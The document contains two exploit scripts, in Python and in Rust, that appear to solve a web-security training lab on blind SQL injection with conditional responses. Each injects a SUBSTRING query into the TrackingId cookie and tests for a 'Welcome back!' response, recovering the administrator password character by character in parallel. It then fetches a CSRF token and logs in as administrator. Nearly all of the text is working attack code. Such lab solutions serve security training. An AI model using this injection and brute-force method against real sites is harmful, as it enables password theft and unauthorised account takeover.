File: with-python/sql-injection/09-blind-sql-injection-with-conditional-responses.py
from lib import (
    SESSION,
    LOGIN_CSRF_XPATH,
    get_csrf_token,
    check_is_lab_solved,
    generate_parser,
)
import re
from string import ascii_lowercase, digits
from multiprocessing import Pool

CHARACTERS = ascii_lowercase + digits


def bruteforce_admin_password(position: int) -> str | None:
    global CHARACTERS

    print(f"[~] Started bruteforcing position {position}")

    for character in CHARACTERS:
        response = SESSION.get(
            f"{lab_url}/",
            cookies={
                "TrackingId": f"{tracking_id}' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {position}, 1) = '{character}' --"
            },
        )

        if response.status_code == 200:
            if "Welcome back!" in response.text:
                print(f"[~] Ended bruteforcing position {position}")
                return character

            else:
                continue

    print(f"[~] Ended bruteforcing position {position}")


if __name__ == "__main__":
    args = generate_parser()

    lab_url = args.lab_url.strip("/")

    tracking_id = ""

    print("[!] Fetching the Tracking ID")

    get_set_cookie = SESSION.get(lab_url).headers.get("Set-Cookie")

    if get_set_cookie:
        match = re.search(r"TrackingId=(.+?);", get_set_cookie)
        if match:
            tracking_id = match.group(1)

    if not tracking_id:
        print("[-] Failed to get tracking_id")
        exit()

    print(f"[+] Got the Tracking ID: {tracking_id}")

    print("[!] Now brute-forcing the `administrator` password")

    administrator_password = ""
    function_args = list(range(1, 30))

    with Pool(10) as p:
        for arg, result in zip(
            function_args, p.imap(bruteforce_admin_password, function_args)
        ):
            if result is None:
                print(f"[+] Function returned None for input {arg}, stopping early.")
                p.terminate()
                break

            administrator_password += result

    print(f"[+] Found the `administrator` password: {administrator_password}")

    print("[+] Now logging in as administrator")

    # Extracting the login form csrf token using xpath
    login_csrf_token = get_csrf_token(
        # Fetching the login page to get the login page csrf token and parsing it with lxml to generate a tree
        SESSION.get(url=f"{lab_url}/login").text,
        LOGIN_CSRF_XPATH,
    )
    print(f"[+] Login CSRF Token: {login_csrf_token}")

    if (
        SESSION.post(
            url=f"{lab_url}/login",
            data={
                "username": "administrator",
                "password": administrator_password,
                "csrf": login_csrf_token,
            },
        ).status_code
        == 200
    ):
        print("[+] Logged in as administrator successfully")
    else:
        print("[-] Failed to login as administrator")
        exit()

    check_is_lab_solved(lab_url)

File: with-rust/sql-injection/src/bin/09-blind-sql-injection-with-conditional-responses.rs
use rayon::prelude::*;
use regex::Regex;
use reqwest::header::COOKIE;
use sql_injection::{
    HTTP_CLIENT, LOGIN_CSRF_TOKEN_SELECTOR, check_is_lab_solved, generate_clap_parser,
    get_csrf_token,
};
use std::sync::{
    Arc, LazyLock,
    atomic::{AtomicBool, Ordering},
};

static TRACKING_ID_REGEX: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"TrackingId=(.+?);").expect("[-] Failed to generate TRACKING_ID_REGEX")
});

static CHARACTERS: &str = "abcdefghijklmnopqrstuvwxyz0123456789";

fn brute_force_admin_password(lab_url: &str, tracking_id: &str, position: &i32) -> Option<char> {
    println!("[~] Started bruteforcing position {}", position);

    for character in CHARACTERS.chars() {
        let response = HTTP_CLIENT
            .get(format!("{}/", lab_url))
            .header(COOKIE, format!("TrackingId={}' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {}, 1) = '{}' --", tracking_id, position, character))
            .send()
            .expect("Failed to send a GET request to /");

        if response.status() == 200 {
            if response
                .text()
                .expect("[-] Failed to extract reponse.text")
                .contains("Welcome back!")
            {
                println!("[~] Ended bruteforcing position {}", position);
                return Some(character);
            }
        } else {
            continue;
        }
    }

    println!("[~] Ended bruteforcing position {}", position);

    None
}

fn main() {
    let args = generate_clap_parser();

    let lab_url = args.lab_url.as_str().trim_end_matches("/");

    logger::info("Fetching the Tracking ID");

    let response = HTTP_CLIENT
        .get(lab_url)
        .send()
        .expect("Failed to send a GET request to /");

    let set_cookie = response
        .headers()
        .get("set-cookie")
        .expect("[-] set-cookie not found");

    let tracking_id = TRACKING_ID_REGEX
        .captures(set_cookie.to_str().expect("[-] Failed to convert to &str"))
        .expect("[-] No captures found")
        .get(1)
        .expect("[-] No capture groups found. Unable to get capture group 1")
        .as_str();

    logger::success(format!("Got th Tracking ID: {}", tracking_id).as_ref());

    logger::info("Now brute-forcing the `administrator` password");

    let stop_flag: Arc<AtomicBool> = Arc::new(AtomicBool::new(false));

    let mut results: Vec<Option<(usize, char)>> = (1..30)
        .into_par_iter()
        .enumerate()
        .map(|(index, position)| {
            if stop_flag.load(Ordering::Relaxed) {
                return None;
            }

            let result: Option<char> = brute_force_admin_password(lab_url, tracking_id, &position);

            match result {
                Some(value) => Some((index, value)),
                None => {
                    logger::info(
                        format!(
                            "Function returned None for input {}, stopping early.",
                            position
                        )
                        .as_ref(),
                    );
                    stop_flag.store(true, Ordering::Relaxed);
                    None
                }
            }
        })
        .collect();

    results.sort_by_key(|option| option.as_ref().map(|(i, _)| *i).unwrap_or(usize::MAX));

    let administrator_password: String = results
        .into_iter()
        .take_while(|res| res.is_some())
        .map(|res| res.unwrap().1)
        .collect();

    if !administrator_password.is_empty() {
        logger::success(format!("Found administrator password: {administrator_password}").as_ref());

        logger::info("Now logging in as administrator");
        logger::info("Getting the login page CSRF TOKEN");

        // Making a GET request to the login page
        let response = HTTP_CLIENT
            .get(format!("{lab_url}/login"))
            .send()
            .expect("[-] Failed to fetch the login page");

        let login_page_csrf_token = get_csrf_token(
            response
                .text()
                .expect("[-] Failed to extract login page body")
                .as_str(),
            &LOGIN_CSRF_TOKEN_SELECTOR,
        );

        logger::success(format!("Login Page CSRF Token: {}", login_page_csrf_token).as_ref());
        logger::info("Performing the login bypass");

        if HTTP_CLIENT
            .post(format!("{}/login", lab_url))
            .form(&[
                ("csrf", login_page_csrf_token),
                ("username", "administrator".to_string()),
                ("password", administrator_password),
            ])
            .send()
            .expect("[-] Failed to login as administrator")
            .status()
            == 200
        {
            logger::success("Login succesfully as administrator");
        } else {
            logger::error("Failed to login as administrator");
        }
    } else {
        panic!(
            "{}",
            logger::error_return("administrator_password is empty")
        )
    }

    check_is_lab_solved(lab_url);
}
